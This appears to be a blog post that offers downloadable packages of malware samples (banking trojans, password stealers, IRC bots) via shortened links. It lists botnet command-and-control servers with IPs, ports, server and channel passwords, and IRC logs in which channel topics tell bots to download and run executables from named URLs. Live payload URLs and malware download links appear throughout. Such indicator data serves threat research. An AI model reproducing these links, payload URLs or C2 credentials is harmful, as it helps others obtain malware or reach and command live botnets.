Here we go: another malware package, around 50 MB, with banking trojans and IRC bots (ngrBot samples). Have fun. Download: http://adf.ly/2Gd5i
Unix.ArabChat.Net (IRC botnet hosted in United States Edison Lomag Internet Services Llc)
Remote Host Port Number
208.185.80.73 6667
NICK n-251662
USER gtytcsb 0 0 :n-251662
JOIN #jon
PONG :UAE.ArabChat.Net
USERHOST n-251662
MODE n-251662 -x+B
hosting infos: http://whois.domaintools.com/208.185.80.73
91.211.117.18 (ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)
Remote Host Port Number
213.251.170.52 80
91.211.117.18 1865
PASS ngrBot
Now talking in #main
Topic On: [ #main ] [ .up http://creatucurso.net/wp-admin/error_log.exe 32c92e5db2642cd842d7efcccb758889 -r ]
Topic By: [ DCD ]
hosting infos: http://whois.domaintools.com/91.211.117.18
www.ircperu.com (ngrBot hosted in Russian Federation Oao Webalta)
www.ircperu.com DNS_TYPE_A 92.241.165.160
92.241.165.160:1863
Nick: n{AT|XPa}plexwne
Username: plexwne
Server Pass: ngrBot
Joined Channel: #IrcPeru with Password PeruRulz!!
Channel Topic for Channel #IrcPeru: “.up http://formulasymanuales.net/images/modules/smiley/thumbsup.gif.exe 0e2faa16ba5ab03e7ab4102497e2fb8f , .mdns http://www.wellnessfarm-shop.de/shop/thumbs.txt”
Private Message to Channel #IrcPeru: “[DNS]: Blocked 0 domain(s) – Redirected 34 domain(s)”
UPDATE: ircperu.com:1863
Remote Host Port Number
141.105.66.247 1863
PASS ngrBot
NICK n{US|XPa}uxfxodg
USER uxfxodg
server.boyrules.com (IRC botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
205.234.231.54 2345
NICK [USA|00|P|20878]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-3951 * 0 :COMPUTERNAME
MODE [USA|00|P|20878] -ix
JOIN #!loco!
PONG 22
MOTD
hosting infos: http://whois.domaintools.com/205.234.231.54
92.241.165.134 (ngrBot hosted in Russian Federation Oao Webalta)
Remote Host Port Number
200.122.132.122 80
213.251.170.52 80
81.169.145.73 80
92.241.165.134 7654
PASS ngrBot
NICK n{US|XPa}bbvvotv
USER bbvvotv 0 0 :bbvvotv
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://coopeande5.com/imagenes/principal.jpg.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" – Download retries: 0
PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 10 domain(s)
UPDATE:
PRIVMSG #oldgold :[DNS]: Blocked
Packed.Win32.Katusha (malware hosted in Netherlands Amsterdam Nforce Entertainment B.v)
dq.javagames7.com
Resolved : [ dq.javagames7.com ] To [ 109.201.135.61 ]
Resolved : [ dq.javagames7.com ] To [ 109.201.135.60 ]
Resolved : [ dq.javagames7.com ] To [ 109.201.135.62 ]
Resolved : [ dq.javagames7.com ] To [ 109.201.135.63 ]
TCP Connection Attempts:
109.201.135.63:8800
109.201.135.61:8800
109.201.135.62:8800
109.201.135.60:8800
exe file: http://31.184.237.180/dqs.exe
hosting infos: http://whois.domaintools.com/109.201.135.63
92.243.4.133 (modified DCI bot hosted in France Gandi)
3 websites use this address. (examples: btcminers.biz labekaa.com xety.fr)
Remote Host Port Number
92.243.4.133 5900
PASS Virus
channel #3new#
NICK VirUs-ymurahxw
USER VirUs "" "gyf" : 8Coded 8VirUs..
NICK VirUs-urxuktmo
USER VirUs "" "gux" :
hosting infos: http://whois.domaintools.com/92.243.4.133
46.20.40.193 (ngrBot hosted in Germany Myloc Managed It Ag)
Remote Host Port Number
213.251.170.52 80
46.20.40.193 1337
PASS ngrBot
NICK n{US|XPa}lqosuhk
USER lqosuhk 0 0 :lqosuhk
JOIN #ngr ngrBot
PONG :Astros.GoV
Now talking in #ngr
Topic On : [ #ngr ] [ !mod pdef on ]
Topic By : [ Astros ]
hosting infos: http://whois.domaintools.com/46.20.40.193
40 MB malware samples
Here again with another package for malware lovers. Most of them are banking trojans, password stealers and IRC bots. Download: http://adf.ly/2CVhM